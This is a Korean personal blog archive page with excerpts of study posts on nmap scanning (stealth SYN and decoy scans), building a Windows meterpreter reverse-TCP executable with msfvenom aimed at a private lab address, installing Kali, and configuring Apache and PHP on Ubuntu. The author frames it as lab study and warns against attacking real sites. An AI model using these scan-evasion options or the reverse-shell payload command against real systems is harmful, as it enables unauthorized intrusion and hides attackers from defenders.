목록2016/11 (15)
삽이 부서질 때까지 삽질
nmap은 사이트에 실행해보면 바로 해킹으로 간주해서 은팔찌입니다.자기 스스로 환경 구축해서 실험하세요. 포트 스캔을 통해서 정보를 수집해보겠습니다. nmap -sP [ip]ping을 사용하여 대상 호스트가 살아있는지 확인 nmap -O [ip]IP의 운영체제를 확인합니다. nmap -sS [IP]스텔스 스캔을 합니다. 이 방식은 3 way handshaking 을 완료하지 않고 syn을 보내고 syn/ack 이 오면 rst를 보내 호스트 open 을 판단하여 로그를 남기지 않으려고 연결을 중단시키는 옵션입니다. nmap -D RND:[num] [IP]num 만큼 랜덤한 ip를 생성하여 패킷을 전송합니다. 상대방에게 가짜 ip를 섞어서 보냄으로 분석하기 힘들게 합니다. -D 옵션 사용 전 -D 옵션 사용..
메타스플로잇을 공부하면서 이것저것 해보는데 정리할 겸 글을 쓰면서 할게요.해당 글을 보시고 제작하여 공격하시면 안됩니다.공격해서 은팔찌 차면... 어디까지나 공부 목적으로 하세요. 타겟은 window 7 x64 입니다 먼저 자신의 내부 IP 주소를 확인 합니다.그래야 제것과 타겟을 연결하겠죠?? msfvenom을 사용해서 제작할거라 먼저 목록을 봅니다. 타겟은 windows 이기 때문에 다른 것을 안보려고 grep으로 windows 만 잡았습니다. msfvenom -l 드디어 msfvenom을 이용해서 제작을 합니다. msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.182.138 lport=4444 -f exe > /root/Desktop/w..
메타스플로잇을 사용하게되서 칼리를 설치했는데 이왕하는거 글을 쓰려고 해요. vm에서 그래픽 인스톨을 하면 정말 쉽기 때문에 필요 없을 거같지만 가끔 너무 다음만 눌르면 잘못 설치하게 되죠... 그래서 주의할 점 3가지와 설치 영상을 준비했습니다. 1.자동 설치가 아닌 수동 설치를 하여 우분투가 아닌 데비안 계열로 설치한다. 2. 파티션 디스크 설정할 때 디스크를 변경하겠나? 라는 물음에 No가 아닌 Yes 로 3. GRUB 부트 로더를 설정할 때 /dev/sda 로 설정할 것! 위 3가지만 조심하시고 설치하시면 정상적으로 칼리가 설치 되실 겁니다. 칼리 다운로드 하러가기 영상에서는 4프로세스에 램4기가 용량 90기가를 주었는데 굳이 이렇게 안하시고 사용하실큼만 설정하시면 됩니다~ 중간 중간 바로 바로 넘..
아파치 서버랑 php 를 설치 했으니 php 기본 설정이 있는 위치를 살펴 보자.[우분투에 아파치 서버 + PHP 설치 글] 아파치랑 php 연결 되어있는 환경 설정은 해당 경로에 있다.이 php.ini 파일을 살펴보면 적용되어있는 환경 설정이 되어있다.이중에서 display_errors 를 살펴보면, 기본적으로 Off가 되어 있고, On 으로 변경하면 어떤 변화가 있는지 살펴보자. 먼저 Off되어있을 경우다.[php 문법을 틀렸을 경우 발생한다.] 페이지에 아무것도 노출이 되지 않는다. On으로 변경 후 서버를 reload 하였다. sudo service apache2 reload - 서버를 켜놓은 상태로 설정을 변경- 속도가 빠름 sudo service apache2 restart- 서버를 종료한 뒤..
갓님께서 웹 수업을 해주시는데 시작이 일주일 안에 PHP로 게시판을 만들기...후후..던지고 해오라고는 방식에 너무 익숙해서 그런지 좋은데?...[변태 아님] 윈도우에는 APM SETUP을 설치하면 되겠지만, 이왕 하는거 리눅스로 하자라는 생각에 우분투를 설치하고 실행을 해보았음. 급한 사람들을 위해서 바로 사용한 명령어들 나열 사용 버전 : ubuntu-16.04.1-desktop-amd64아무것도 설치 안한 순정입니다. 사용한 명령어 sudo apt-get updatesudo apt-get upgradesudo apt-get install apache2sudo apt-get install php libapache2-mod-php php-xml php-gd php-mysqlsudo apt-get ins..